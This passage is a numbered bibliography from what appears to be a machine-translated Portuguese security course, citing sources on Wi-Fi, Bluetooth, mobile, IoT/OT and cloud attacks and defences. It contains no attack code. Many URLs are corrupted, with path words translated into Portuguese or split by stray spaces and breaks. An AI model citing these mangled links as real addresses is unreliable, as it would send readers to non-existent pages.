365. Protegendo sua rede sem fio contra hackers, contra

http://www.businessknowledgesource.com/technology/protecting_your_wireless_network_from_hacking_025027.html.
366. Agustina, JV Peng Zhang e Kantola, (2003), Avaliação do desempenho do tráfego de transferência GSM em uma rede GPRS/GSM, em https://
ieeexplore.ieee.org/document/1214113?isnumber=27298&arnumber=1214113&count=217&index =21.
367. Identificador do conjunto de serviços, de https://searchmobilecomputing.techtarget.com/definition/service-set-identifier.
368. Humphrey Cheung, (2005), How To Crack WEP - Part 1: Setup & Network Recon, de https://
www.tomsguide.com/us/how-to-crack-wep,review-451.html.
369. Humphrey Cheung, (2005), How To Crack WEP - Part 2: Performing the Crack, de https://www.tomsguide.com/us/how
to-crack-wep,review-459.html.
370. Humphrey Cheung, (2005), How To Crack WEP - Parte 3: Protegendo sua WLAN, em https://www.tomsguide.com/us/how
to-crack-wep,review-471.html.
371. Chris Weber e Gary Bahadur, (2009), Wireless Networking Security, de https://docs.microsoft.com/en-us/previousversions/windows/it-pro/
windows-xp/bb457019(v=technet. 10)?redirecionado de=MSDN.
372. (2009), How 802.11 Wireless Works, de https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows server-2003/cc757419(v=ws.10)?

redirecionado de=MSDN.
373. Brandon Teska, (2008), How To Crack WPA / WPA2, de https://www.smallnetbuilder.com/wireless/wireless

howto/30278-how-to-crack-wpa--wpa2.
374. (2006), How To Crack WEP and WPA Wireless Networks, de http://121space.com/index.php?showtopic=3376.
375. (2009), Como evitar ataques DoS sem fio, em https://searchsecurity.techtarget.com/feature/How-to-prevent

ataques DoS sem fio.
376. Peter Loshin, (2009), Uma lista de ataques de rede sem fio, de https://searchsecurity.techtarget.com/feature/A-list-of
ataques de rede sem fio.
377. Lisa Phifer, (2009), Uma lista de verificação de avaliação de vulnerabilidade de rede sem fio, de
https://searchsecurity.techtarget.com/feature/A-wireless-network-vulnerability-assessment-checklist.

Referências
378. Lisa Phifer, (2009), Hunting for rogue wireless devices, de https://searchsecurity.techtarget.com/feature/Hunting-for
dispositivos sem fio desonestos.
379. PreciousJohnDoe, List of Wireless Network Attacks, de https://www.brighthub.com/computing/smb

segurança/artigos/53949/.
380. Laurent Oudot, (2004), Wireless Honeypot Countermeasures, de https://www.symantec.com/connect/articles/wireless

honeypot-contramedidas.
381. Andrei A. Mikhailovsky, Konstantin V. Gavrilenko e Andrew Vladimirov, (2004), The Frame of Deception: Wireless Man
In-the-Middle Attacks e Rogue Access Points Deployment, em http://
www.informit.com/articles/article.aspx?p=353735&seqNum=7.
382. Renee Oricchio, How to Surf Safely on Public Wi-Fi, em https://www.inc.com/telecom/articles/200707/wifi.html.
383. O que é WiFi, de https://www.scambusters.org/wifi.html.
384. Trishna Panse e Prashant Panse, (2013), A Survey on Security Threats and Vulnerability attack on Bluetooth
Communication, de http://www.ijcsit.com/docs/Volume%204/Vol4Issue5/ijcsit2013040521.pdf.
385. Como Bluejack, em https://www.wikihow.com/Bluejack.
386. John Padgette e Karen Scarfone, (2012), Guide to Bluetooth Security (Rascunho), de
https://csrc.nist.gov/csrc/media/publications/sp/800-121/rev-1/final/documents/draft-sp800-121_rev1.pdf.
387. Nateq Be-Nazir Ibn Minar e Mohammed Tarique, (2012), Bluetooth Security Threats And Solutions: A Survey, de
http://airccse.org/journal/ijdps/papers/0112ijdps10.pdf.
388. Keijo MJ Haataja, (2005), Descrições detalhadas de novas ferramentas de análise de segurança Bluetooth de prova de conceito e nova segurança
ataques, de http://www.cs.uku.fi/tutkimus/publications/reports/B-2005-1.pdf.
389. (2017), O que você deve saber sobre a fraqueza de segurança WiFi 'KRACK', de
https://krebsonsecurity.com/2017/10/what-you-should-know-about-the-krack-wifi-security-weakness/.
390. Lily Hay Newman, (2017), O padrão Wi-Fi 'seguro' tem uma falha enorme e perigosa, de
https://www.wired.com/story/krack-wi-fi-wpa2-vulnerability/.
391. Steve Tilson, (2017), WPA2 Key Reinstallation Attack (KRACK) Vulnerability Detection Dashboard, from
https://www.tenable.com/sc-dashboards/wpa2-key-reinstallation-attack-krack-vulnerability-detection-dashboard.
392. Thomas Brewster, (2017), Update Every Device -- This KRACK Hack Kills Your Wi-Fi Privacy, from
https://www.forbes.com/sites/thomasbrewster/2017/10/16/krack-attack-breaks-wifi-encryption/#3d9b890e2ba9.
393. Paul Ducklin, (2017), Wi-Fi em risco de ataques KRACK - aqui está o que fazer, de
https://nakedsecurity.sophos.com/2017/10/16/wi-fi-at-risk-from-krack-attacks-heres-what-to-do/.
394. Charlie Osborne e Zack Whittaker, (2017), Aqui estão todos os patches para a vulnerabilidade KRACK Wi-Fi disponíveis agora, em https://
www.zdnet.com/article/here-is-every-patch-for-krack- wi-fi-ataque-disponível-agora/.
395. Michael Heller, (2017), a falha KRACK WPA2 pode ser mais exagero do que risco, de
https://searchsecurity.techtarget.com/news/450428414/KRACK-WPA2-vulnerability-might-be-more-hype-than-risk.
396. Ataques aos protocolos EAP, de http://

etutorials.org/Networking/Wireless+lan+security/Chapter+6.+Wireless+Vulnerabilities/Attacks+on+EAP+Protocols/.
397. Protocolos de segurança sem fio: WEP, WPA, WPA2 e WPA3, de https://www.cyberpunk.rs/wireless-security-protocols
wep-wpa-wpa2-e-wpa3.
398. Penny Hoelscher, (2018), O que é WPA3, é seguro e devo usá-lo?, em https://
www.comparitech.com/blog/information-security/what-is-wpa3/.
399. Descubra o Wi-Fi Security, em https://www.wi-fi.org/discover-wi-fi/security.
400. (2018), WPA3 explicado, de https://medium.com/@reliancegcs/wpa3-explained-wi-fi-is-getting-major-security-update

2b6dca8f3aff.
401. (2020), Wi-Fi Protected Access, em https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access.
402. (2013), Wireless Attacks Unleashed, de https://resources.infosecinstitute.com/wireless-attacks-unleashed/#gref.
403. Gurubaran S, (2019), Pentesting & Crack WPA/WPA2 WiFi Passwords with Wifiphisher by Jamming the WiFi, from
https://gbhackers.com/crack-wpawpa2-kali-linux-tutorial/.

Referências
404. Tomáš Foltýn, (2019), WPA3 Flaws May Let Attackers Steal Wi-Fi Passwords, em https://
www.welivesecurity.com/2019/04/11/wpa3-flaws-steal-wifi-passwords/.
405. Catalin Cimpanu, (2019), vulnerabilidades Dragonblood divulgadas no padrão WiFi WPA3, de
https://www.zdnet.com/article/dragonblood-vulnerabilities-disclosed-in-wifi-wpa3-standard/. .
406. Dan Goodun, (2019), Falhas graves deixam o WPA3 vulnerável a hacks que roubam senhas de Wi-Fi, de
https://arstechnica.com/information-technology/2019/04/serious-flaws-leave-wpa3-vulnerable-to-hacks-that-steal-wi-fi passwords/.
407. Michael Peters, (2019), Dragonblood Vulnerabilities Discovered in WPA3 WiFi Standard, de
https://securityboulevard.com/2019/04/dragonblood-vulnerabilities-discovered-in-wpa3-wifi-standard/.
408. Sergiu Gatlan, (2019), WPA3 Wi-Fi Standard Affected by New Dragonblood Vulnerabilities, de
https://www.bleepingcomputer.com/news/security/wpa3-wi-fi-standard-affected-by-new-dragonblood-vulnerabilities/.
409. Pierluigi Paganini, (2019), WPA3 Attacks Allow Hackers to Hack Wi-Fi Password, em https://securityaffairs.co/
wordpress/83653/hacking/wpa3-security-flaws.html.
410. Daniele Antonioli, Nils Ole Tippenhauer e Kasper B. Rasmussen, The KNOB is Broken: Exploiting Low Entropy in the Encryption Key Negotiation
of Bluetooth BR/EDR, from https://www.usenix.org/conference/usenixsecurity19/presentation /antonioli.
411. Doug Lynch, (2019), KNOB Attack explora falha de especificação do Bluetooth para espionar conexões de dispositivos, em https://www.xda
developers.com/knob-attack-bluetooth-flaw/.
412. Michael Heller, (2019), o ataque KNOB coloca todos os dispositivos Bluetooth em risco, desde
https://searchsecurity.techtarget.com/news/252468914/KNOB-attack-puts-all-Bluetooth-devices-at-risk.
413. Daniele Antonioli, (2019), Sobre o KNOB Attack, em https://knobattack.com.
414. Mathy Vanhoef e Eyal Ronen, Dragonblood: Analyzing the Dragonfly Handshake of WPA3 and EAP-pwd, em https://papers.mathyvanhoef.com/
dragonblood.pdf.
415. Trapti Pandey e Pratha Khare, Bluetooth Hacking and its Prevention, de
https://www.ltts.com/sites/default/files/resources/pdf/whitepapers/2017-12/Bluetooth-Hacking-and-its-Prevention.pdf.
416. Art Miller, (2019), How to Protect Yourself from Bluetooth Hacking, em https://www.vectorsecurity.com/blog/how-to
proteja-se-de-hacking-bluetooth.
Módulo 09: Ataques móveis e contramedidas
417. Android framework para exploração, de http://www.xysec.com/afe_manual.pdf.
418. Sarah Perez, (2010), Como hackear seu telefone Android (e por que você deveria se preocupar), em https://
readwrite.com/2010/01/27/how_to_hack_your_android_phone/.
419. (2016), OWASP Mobile Top 10, de https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_- _Top_Ten_Mobile_Risks.
420. Relatório de ameaças à segurança de 2014, em https://www.sophos.com/en-us/medialibrary/PDFs/other/sophos-security-threat

relatório-2014.pdf.
421. wiseGEEK, What is Mobile Phone Spam?, em https://www.wisegeek.com/what-is-mobile-phone-spam.htm.
422. Murugiah Souppaya e Karen Scarfone, (2013), Diretrizes para gerenciar a segurança de dispositivos móveis na empresa, em https://csrc.nist.gov/csrc/
media/publications/sp/800-124/rev-1 /final/documents/draft_sp800-124-rev1.pdf.
423. Michael Cooney, (2012), 10 problemas comuns de segurança móvel para atacar, de
https://www.pcworld.com/article/2010278/10-common-mobile-security-problems-to-attack.html.
424. Shruti Dhapola, (2014), Android é o sistema operacional móvel mais invadido: Veja como proteger seu telefone, de
https://www.firstpost.com/tech/news-analysis/android-malware-increasing-tips-protect-phone-3647981.html.
425. Jailbreak do iOS, em https://en.wikipedia.org/wiki/IOS_jailbreaking#Types_of_jailbreaks.
426. Lisa Phifer, (2013), Estratégias de segurança BYOD: Equilibrando riscos e recompensas BYOD, de
https://searchsecurity.techtarget.com/feature/BYOD-security-strategies-Balancing-BYOD-risks-and-rewards.

Referências
427. Sam Bakken, (2017), Defense in Depth: A Layered Approach to Mobile Security with MDM, MAM & Mobile App Vetting,
de https://www.nowsecure.com/blog/2017/12/12/defense-in-depth-a-layered-approach-to-mobile-security-with-mdm mam-mobile-app-vetting/.
428. (2017), Anatomy of an Android, em https://www.sophos.com/en-us/medialibrary/PDFs/other/sophos-anatomy-of-an android-infographic.pdf.
429. Victor Chebyshev, Fedor Sinitsyn, Denis Parinov, Boris Larin, Oleg Kupreev e Evgeny Lopatin, (2019), evolução das ameaças de TI
Q2 2019. Estatísticas, de https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/.
430. “Agent Smith”: o novo vírus para atingir dispositivos móveis, em https://blog.checkpoint.com/2019/07/10/agent-smith-android
malware-mobile-phone-hack-virus-google/.
431. (2019), o vírus Agent Smith se esconde no WhatsApp, infesta 1,5 crore de telefones Android na Índia: o que é, caso você se preocupe, em https://
www.indiatoday.in/technology/news/story/agent-smith- vírus-whatsapp-infecta-telefones-android-na-índia-o-que-é-isso 1566668-2019-07-11.
432. Aviran Hazum, Feixiang He, Inbal Marom, Bogdan Melnykov e Andrey Polkovnichenko, (2019), Agent Smith: A New Species of Mobile Malware, de
https://research.checkpoint.com/agent-smith-a-new -species-of-mobile-malware/.
433. Pierluigi Paganini, (2016), Pesquisadores hackeiam contas do WhatsApp através do protocolo SS7, de
https://securityaffairs.co/wordpress/47179/hacking/hacking-ss7-protocol.html.
434. Samuel Gibbs, (2016), SS7 hack explicou: o que você pode fazer sobre isso?, de
https://www.theguardian.com/technology/2016/apr/19/ss7-hack-explained-mobile-phone-vulnerability-snooping-texts chamadas.
435. Proteja sua rede contra ataques SS7, em https://www.sinch.com/insights/operator-opportunities/ss7/?cn-reloaded=1.
436. Simjacker, de https://simjacker.com.
437. Shouvik Das, (2019), seus dados e localização podem ser rastreados com esta falha no cartão SIM, sem o seu conhecimento, em https://
www.news18.com/news/tech/your-data-location-might-be -rastreado-com-este-sim-card-falha-sem-seu conhecimento-2306879.html.
438. Mohit Kumar, (2019), Nova falha no cartão SIM permite que hackers sequestrem qualquer telefone apenas enviando SMS, de
https://thehackernews.com/2019/09/simjacker-mobile-hacking.html.
439. Connor Jones, (2019), telefones Android vulneráveis a ataques avançados de phishing por SMS, de
https://www.itpro.co.uk/security/34334/android-phones-vulnerable-to-advanced-sms-phishing-attacks.
440. Ravie Lakshmanan, (2019), os hackers agora estão atacando usuários do Android com técnicas avançadas de phishing por SMS, de
https://thenextweb.com/security/2019/09/04/hackers-are-now-attacking-android-users-with-advanced-sms-phishing técnicas/.
441. Heinrich Long, (2020), Como proteger seu dispositivo Android e ter mais privacidade, em https://
restoreprivacy.com/secure-android-privacy/.
442. Michael Simon, (2019), How to Secure, Protect, and Completely Lock Down Your Android Phone, em https://www.pcworld.com/
article/3332211/secure-android-phone.html.
443. Steven J. e Vaughan-Nichols, (2018), As 10 melhores maneiras de proteger seu telefone Android, de
https://www.zdnet.com/article/the-ten-best-ways-to-secure-your-android-phone/.
444. Lewis Painter, (2019), iPhone Security Tips: How to Protect Your Phone from Hackers, from
https://www.macworld.co.uk/how-to/iphone/iphone-security-tips-3638233/.
445. (2019), 5 maneiras fáceis de proteger seu iPhone e privacidade em 2020 GRÁTIS, em https://www.vpnmentor.com/blog/protect
privacidade-iphone/.
446. Ken Hess, (2014), 10 diretrizes de política BYOD para um ambiente de trabalho seguro, em https://techtalk.gfi.com/10-byod-policy
diretrizes-para-um-ambiente-de-trabalho-seguro/.
447. OWASP Mobile Top 10, de https://owasp.org/www-project-mobile-top-10/#tab=Top_10_Mobile_Controls.
448. (2020), evolução das ameaças de TI Q3 2020 Estatísticas móveis, de https://securelist.com/it-threat-evolution-q3-2020-mobile

estatísticas/99461/
#:~:text=Mobile%20threat%20statistics,than%20in%20the%20previous%20quarter.&text=For%20the%20first%20time%20in,comparated%20to%20the%20previous%20period.
449. Mobile Security Primer, de https://books.nowsecure.com/secure-mobile-development/en/primer/mobile-security.html.

Referências
Módulo 10: Ataques e contramedidas IoT e OT
450. Margaret Rouse, (2016), Internet of Things (IoT), de https://internetofthingsagenda.techtarget.com/definition/Internet

das-Coisas-IoT.
451. Bernadette Johnson, How the Internet of Things Works, em https://computer.howstuffworks.com/internet-of-things.htm.
452. (2016), The Pros and Cons of IoT, em http://www.humavox.com/blog/pros-cons-iot/.
453. (2015), How IoT Works – An Overview of the Technology Architecture, em https://www.embitel.com/blog/embedded
blog/how-iot-works-an-overview-of-the-technology-architeture-2.
454. Internet das Coisas: Explicado, em https://www.carritech.com/news/internet-of-things/.
455. Dr. Gaurav Bajpai, Middleware para Internet das Coisas, de

http://wireless.ictp.it/rwanda_2015/presentations/Middleware_IoT.pdf.
456. M2M/IoT Sector Map, de http://www.beechamresearch.com/article.aspx?id=4.
457. Vasanth Ganesan, (2016), Video Meets the Internet of Things, de https://www.mckinsey.com/industries/technology
mídia-e-telecomunicações/nossos-insights/vídeo-encontra-a-internet-das-coisas.
458. Internet das coisas, de https://en.wikipedia.org/wiki/Internet_of_things#Trends_and_characteristics.
459. Anupama Kaushik, (2016), IOT-An Overview, em https://www.ijarcce.com/upload/2016/march-16/IJARCCE%20264.pdf.
460. Karen Rose, Scott Eldridge, Lyman Chapin, (2015), The Internet of Things: An Overview, from
https://www.internetsociety.org/wp-content/uploads/2017/08/ISOC-IoT-Overview-20151221-en.pdf.
461. Bruce Byfield, (2016), The Internet of Things: 7 Challenges, de https://www.datamation.com/data-center/the-internet

of-things-7-challenges/.
462. Aritra Sarkhel, (2016), 5 challenge to Internet of Things, de https://economictimes.indiatimes.com/internet/5-

challenge-to-internet-of-things/articleshow/52700940.cms.
463. Robbie Mitchell, (2015), 5 challenge of the Internet of Things, de https://blog.apnic.net/2015/10/20/5-challenges-of the-internet-of-things/.
464. Charlie Ashton, (2015), Is IoT a Threat or an Opportunity for Service Providers?, de
https://www.sdxcentral.com/articles/contributed/iot-threat-opportunity-service-providers-charlie-ashton/2015/06/.
465. Avantika Monnappa, (2018), TOGAF e a Internet das Coisas, em https://www.simplilearn.com/togaf-applications-in

internet-das-coisas-iot-artigo.
466. Tessel Renzenbrink, (2014), Internet das coisas representa um risco de privacidade sem precedentes, de
https://www.elektormagazine.com/articles/internet-of-things-poses-an-unprecedented-privacy-risk.
467. (2016), Principais vulnerabilidades de IoT, de

https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10.
468. Masato Terada, Naoko e Naoko Ohnishi, (2017), HIRT-PUB16003: ataques cibernéticos usando dispositivos IoT,
https://www.hitachi.com/hirt/publications/hirt-pub16003/index.html.
469. APNIC, (2017), IoT - a próxima onda do cenário de ameaças DDoS, em https://www.slideshare.net/apnic/iot-the-next-wave of-ddos-threat-
landscape?qid=b1d633e5- 2d40-4151-b3ec-91d93be094ea&v=&b=&from_search=6.
470. Jaikumar Vijayan, (2014), ataque ao alvo mostra o perigo de sistemas HVAC acessíveis remotamente, de
https://www.computerworld.com/article/2487452/cybercrime-hacking/target-attack-shows-danger-of-remotely access-hvac-systems.html.
471. Paul Roberts, (2012), FBI emitiu alerta sobre o ataque de julho ao sistema HVAC, de https://securityledger.com/2012/12/fbi emitiram-alert-
over-july-attack-on-hvac-system/.
472. Erez Metula, (2016), Hacking The IoT (Internet of Things) - PenTesting RF Operated Devices, from
https://www.owasp.org/images/2/29/AppSecIL2016_HackingTheIoT-PenTestingRFDevices_ErezMetula.pdf.
473. Jerry Hildenbrand, (2017), vamos falar sobre Blueborne, a mais recente vulnerabilidade do Bluetooth, em https://
www.androidcentral.com/lets-talk-about-blueborne-latest-bluetooth-vulnerability.
474. (2017), O vetor de ataque “BlueBorne” expõe quase todos os dispositivos conectados, em https://www.armis.com/blueborne/.
475. Blueborne Attack Threatens IoT Devices, em https://www.pindrop.com/blog/blueborne-attack-threatens-iot-devices/.

Referências
476. Kim Zetter, (2016), Inside the astuto e sem precedentes hack da rede elétrica da Ucrânia, de
https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/.
477. Rita Sharma, Top 10 Enterprises Challenges Face in IoT Implementation, em https://www.finoit.com/blog/enterprise
challenge-in-iot/.
478. Ameaças da Internet das Coisas (IoT), em https://appsec-labs.com/iot_threats/#toggle-id-5.
479. (2019), IoT Application Security Challenges and Solutions, em https://www.iotforall.com/iot-application-security/.
480. Anand Srinivasan, (2017), Understanding SDR-Based Attacks on IoT, em https://datafloq.com/read/understanding-sdr

based-attacks-on-iot/3735.
481. Nitesh Malviya, IoT Radio Communication Attack, de https://resources.infosecinstitute.com/iot-radio-communication

ataque/#gref.
482. Robert Keim, (2017), Introduction to Software-Defined Radio, em https://www.allaboutcircuits.com/technical articles/introduction-

to-software-defined-radio/.
483. Rene Millman, (2018), Hackers poderiam usar ataques baseados na Web para assumir o controle de dispositivos IoT, de
https://internetofbusiness.com/hackers-could-use-web-based-attacks-to-take-over-iot-devices/.
484. Gunes Acar, Danny Huang, Frank Li, Arvind Narayanan e Nick Feamster, Web-based Attacks on Local IoT Devices, de
https://conferences.sigcomm.org/sigcomm/2018/files/slides/iot/paper_3.1.pdf.
485. Margaret Rouse, (2008), DNS Rebinding Attack, de https://searchsecurity.techtarget.com/definition/DNS-rebinding

ataque.
486. Kobus Marneweck, (2019), The Role of Physical Security in IoT, em https://community.arm.com/iot/b/blog/posts/the
papel-da-segurança-física-no-iot.
487. Shivam Bhasin e Debdeep Mukhopadhyay, (2016), Ataques de Injeção de Falhas, de

https://pdfs.semanticscholar.org/0ae1/a6e055383e64011fa639e42f9294d11c3639.pdf.
488. Hezam Akram Abdul-Ghani, Dimitri Konstantas e Mohammed Mahyoub, (2018), A Comprehensive IoT Attacks Survey
Com base em um modelo de referência de bloco de construção, de https://thesai.org/Downloads/Volume9No3/Paper_49-
A_Comprehensive_IoT_Attacks_Survey.pdf.
489. Karen Taylor, Mark Steedman, Amen Sanghera e Matthew Thaxter, (2018), Medtech and the Internet of Medical Things, em https://
www2.deloitte.com/content/dam/Deloitte/global/Documents/Life- Sciences-Health-Care/gx-lshc-medtech iomt-brochure.pdf.
490. Dra. Leonie Maria Tanczer, Dra. Ine Steenmans, Dra. Irina Brass e Dra. Madeline Carr, (2018), Networked World Risks and
Oportunidades na Internet das Coisas, em https://
discovery.ucl.ac.uk/id/eprint/10063068/1/InterconnectedWorld2018.pdf.
491. OWASP Internet of Things, de https://owasp.org/www-project-internet-of

things/#Things_to_check_for_once_the_file_system_is_mounted_or_extracted.
492. IoT industrial: ameaças e contramedidas, em https://www.rambus.com/iot/industrial-iot/.
493. Segurança da Internet das Coisas (IoT): 9 maneiras de ajudar a se proteger, em https://us.norton.com/internetsecurity-iot
protegendo-a-internet-das-coisas.html.
494. Cujo AI, (2018), Five Key Security Tips to Avoid an IoT Hack, em https://www.helpnetsecurity.com/2018/08/14/avoid-iot
hackear/.
495. Ataques comuns em dispositivos IoT, em https://elinux.org/images/f/f8/Common-Attacks-on-IoT-Devices-Christina-Quast.pdf.
496. Jeff Day, Roger Shepherd, Paul Kearney e Richard Storer, (2018), Guias de Melhores Práticas, de
https://www.iotsecurityfoundation.org/wp-content/uploads/2019/03/Best-Practice-Guides-Release-1.2.1.pdf.
497. (2020), Tecnologia Operacional, de https://en.wikipedia.org/wiki/Operational_Technology.
498. Lauren Horwitz, redes OT e redes de TI estão intimamente interligadas, em https://

www.cisco.com/c/en/us/products/security/ot-networks.html.
499. Tecnologia Operacional (TO) – Definições e Diferenças com TI, em https://www.i-scoop.eu/industry-4-0/operational

tecnologia-ot/.
500. Graham Williamson, (2015), OT, ICS, SCADA – Qual é a diferença?, de

https://www.kuppingercole.com/blog/williamson/ot-ics-scada-whats-the-difference.

Referências
501. Sobre Redes Industriais, em https://www.oreilly.com/library/view/industrial-network

security/9780124201149/B9780124201149000022/B9780124201149000022.xhtml#B9780124201149000022.
502. Mohamed Babikir, (2018), Convergence of IT and OT in Energy and Manufacturing, de https://
www.digitalistmag.com/cio-knowledge/2018/11/05/convergence-of-it-ot-in- energia-fabricação-06192743/.
503. Tim Sowell, (2015), OT/IT Convergence “What does it mean in the Industrial World?”, de
http://operationalevolution.blogspot.com/2015/02/otit-convergence-what-does-it-mean-in.html.
504. Bridging the Gap Between Operational Technology and Information Technology, em https://
www.avnet.com/wps/wcm/connect/onesite/90fb068d-33a4-4039-970e-91bea619456f/pa-eurotechot-it whitepaper-inc0364043-
0416-en.pdf?MOD=AJPERES&CVID=lFRXUrV&id=1489688438797.
505. Iniciantes: O que é Industrial IoT (IIoT), em https://www.youtube.com/watch?v=6MN0xRJ3yzE.
506. O modelo Purdue para sistemas de controle industrial, de

https://subscription.packtpub.com/book/networking_and_servers/9781788395151/1/ch01lvl1sec10/the-purdue-model for-industrial-control-
systems.
507. (2019), Blueprint for Securing Industrial Control Systems, em https://www.checkpoint.com/downloads/products/cp

industrial-control-ics-security-blueprint.pdf.
508. Guia de Projeto e Implementação Ethernet-to-the-Factory 1.2, de https://

www.cisco.com/c/en/us/td/docs/solutions/Verticals/EttF/EttFDIG/ch2_EttF.html.
509. Rick Peters, (2019), Principais conclusões sobre o estado da tecnologia operacional e segurança cibernética, de
https://www.csoonline.com/article/3392579/key-findings-on-the-state-of-operational-technology-and
cybersecurity.html#:~:targetText=Cybersecurity%20Risks%20for%20Operational%20Technology&targetText= Os
%20%20%20%20mais%comuns%20tipos%20de,spyware%2C%20e%20%20mobile%20security%20breaks.
510. Tecnologia Operacional e Segurança, em http://trustcentral.com/use-cases/operational-technology-ot-and-iiot/.
511. (2018), Side-Channel Attacks Put Critical Infrastructure at Risk, em https://www.icscybersecurityconference.com/side channel-attacks-put-
critical-infrastructure-at-risk/.
512. Eduard Kovacs, (2018), ICS Devices Vulnerable to Side-Channel Attacks: Researcher, de https://
www.securityweek.com/ics-devices-vulnerable-side-channel-attacks-researcher.
513. Dr. Siv Hilde Houmb, (2018), How to Hack Programmable Logic Controllers, de
https://www.controldesign.com/articles/2018/how-to-hack-programmable-logic-controllers/.
514. Ali Abbasi e Majid Hashemi, (2016), Ghost in the PLC: Designing an Undetectable Programmable Logic Controller Rootkit via Pin Control Attack,
de https://research.utwente.nl/en/publications/ghost-in-the- plc-projetando-um-indetectável-programável-logic-con.
515. (2019), Ataques contra máquinas industriais por meio de controladores remotos por rádio vulneráveis: análise de segurança e
Recomendações, de https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks against-industrial-machines-
via-vulnerable-radio-remote-controllers-security-analysis-and- recomendações.
516. Bruce Sussman, (2019), Industrial Cybersecurity: RF Vulnerability, de https://www.secureworldexpo.com/industry

news/industrial-cybersecurity-risk-study.
517. (2018), Uma introdução à tecnologia operacional e sua segurança: 5 fatos importantes, de
https://www.vsec.infinigate.co.uk/blog/operational-technology-security-ransomware-threats.
518. Marcel Kisch, (2017), What Do Recent Attacks Mean for OT Network Security?, em https://securityintelligence.com/what do-recent-attacks-mean-
for-ot-network-security/.
519. Um Guia Executivo de Segurança Cibernética para Tecnologia Operacional, de

https://www.ge.com/fr/sites/www.ge.com.fr/files/an-executive-guide-to-cyber-security-for-operational-technology whitepaper.pdf.
520. Adrian Booth, Aman Dhingra, Sven Heiligtag, Mahir Nayfeh e Daniel Wallance, (2019), Critical Infrastructure Companies and the Global
Cybersecurity Threat, de https://www.mckinsey.com/business-functions/risk/our- insights/empresas-de-infra-estrutura crítica-e-a-ameaça-da-
cibersegurança-global.
521. Lauren Gibbons Paul, (2018), Making Sense of the ICS Cybersecurity Market, em https://
www.automationworld.com/home/article/13318353/making-sense-of-the-ics-cybersecurity-market.

Referências
Módulo 11: Ameaças e contramedidas da computação em nuvem

522. 2013), Cloud Computing Vulnerability Incidents: A Statistical Overview, em https://
cloudsecurityalliance.org/download/cloud-computing-vulnerability-incidents-a-statistical-overview/.
523. Alok Tripathi e Abhinav Mishra, (2011), Cloud Computing Security Considerations, de
https://www.semanticscholar.org/paper/Cloud-computing-security-considerations-Tripathi Mishra/
fd710d62f8db9621d97ab00acf1bb8e8d28e06b2.
524. Kazi Zunnurhain e Susan V. Vrbsky, Security Attacks and Solutions in Clouds, de
http://salsahpc.indiana.edu/CloudCom2010/Poster/cloudcom2010_submission_98.pdf.
525. Chimere Barron, Huiming Yu e Justin Zhan (2013), Cloud Computing Security Case Studies and Research, de
http://www.iaeng.org/publication/WCE2013/WCE2013_pp1287-1291.pdf.
526. Keiko Hashizume, David G Rosado, Eduardo Fernandez-Medina e Eduardo B Fernandez (2013), uma análise de problemas de
segurança para computação em nuvem -5.
527. Ian Mitchell e John Alcock, Cloud Security O guia definitivo para gerenciar riscos no novo cenário de TIC, de
https://www.fujitsu.com/global/Images/WBOC-2-Security.pdf.
528. Ataques Man in the Cloud (MITC), em https://www.imperva.com/docs/HII_Man_In_The_Cloud_Attacks.pdf.
529. Martin Gontovnikas, (2018), What Is Identity as a Service (IDaaS)?, de https://auth0.com/blog/identity-as-a-service-in

2018/.
530. Multi-Cloud, em https://avinetworks.com/glossary/multi-cloud/.
531. (2019), Multicloud, de https://en.wikipedia.org/wiki/Multicloud.
532. Rich Caldwell, (2019), Pros and Cons of a Multi-Cloud Strategy, de https://centricconsulting.com/blog/pros-and-cons-of
a-multi-cloud-strategy/.
533. Jignesh Solanki, 6 designs de arquitetura multinuvem para uma estratégia de nuvem eficaz, em https://www.simform.com/multi
nuvem-arquitetura/.
534. (2020), armazenamento em nuvem, de https://en.wikipedia.org/wiki/Cloud_storage.
535. Laxmi Ashrit, What is Cloud Storage – Architecture, Types, Advantages & Disadvantages, em https://
electricalfundablog.com/cloud-storage-architecture-types/.
536. Ensaio básico de tecnologia da informação sobre arquitetura de armazenamento em nuvem, de https://
www.uniassignment.com/essay samples/information-technology/basic-cloud-storage-architecture-information-technology-essay.php.
537. (2019), What is Containers as a service (CaaS)?, em https://www.ibm.com/services/cloud/containers-as-a-service.
538. Murugiah Souppaya, John Morello e Karen Scarfone, (2017), Application Container Security Guide, de
https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-190.pdf.
539. Sten Pittet, What is a Container?, em https://www.atlassian.com/continuous-delivery/microservices/containers.
540. Pethuru Raj, Jeeva S. Chelladhurai e Vinod Singh, (2015), Containerização vs Virtualização – Uma introdução ao Docker,
de https://jaxenter.com/containerization-vs-virtualization-docker-introduction-120562.html.
541. Como a conteinerização é diferente da virtualização?, de https://www.techopedia.com/7/31288/technology

tendências/como a conteinerização é diferente da virtualização.
542. Roderick Bauer, (2018), What's the Diff: VMs vs Containers, em https://www.backblaze.com/blog/vm-vs-containers/.
543. (2020), Docker (software), de https://en.wikipedia.org/wiki/Docker_(software).
544. Visão geral do Docker, em https://docs.docker.com/engine/docker-overview/.
545. Docker Containers, em https://www.aquasec.com/wiki/display/containers/Docker+Containers.
546. Avi, (2019), Docker Architecture and its Components for Beginner, em https://geekflare.com/docker-architecture/.
547. Docker Architecture, em https://www.aquasec.com/wiki/display/containers/Docker+Architecture.
548. Visão geral do modo Swarm, em https://docs.docker.com/engine/swarm/.
549. O que é Docker Swarm, de https://www.aquasec.com/wiki/display/containers/Docker+Containers#DockerContainers

DOCKERSWARM.

Referências
550. (2019), Designing a Microservices Architecture with Docker Containers, de

https://www.sumologic.com/insight/microservices-architecture-docker-containers/.
551. Asad Faizi, (2019), Microservices Orchestration with Kubernetes, em https://medium.com/faun/microservices Orchestration-with-
kubernetes-1cbb737cfa46.
552. (2018), Docker Networking, de https://github.com/kyhau/docker-notebook/blob/master/docker-networking.md.
553. Saurabh Kulshrestha, (2018), Docker Networking - Explore como os contêineres se comunicam, de
https://medium.com/edureka/docker-networking-1a7d65e89013.
554. Isaac Eldridge, (2018), What Is Container Orchestration?, em https://blog.newrelic.com/engineering/container

orquestração explicada/.
555. Container Orchestration, em https://avinetworks.com/glossary/container-orchestration/.
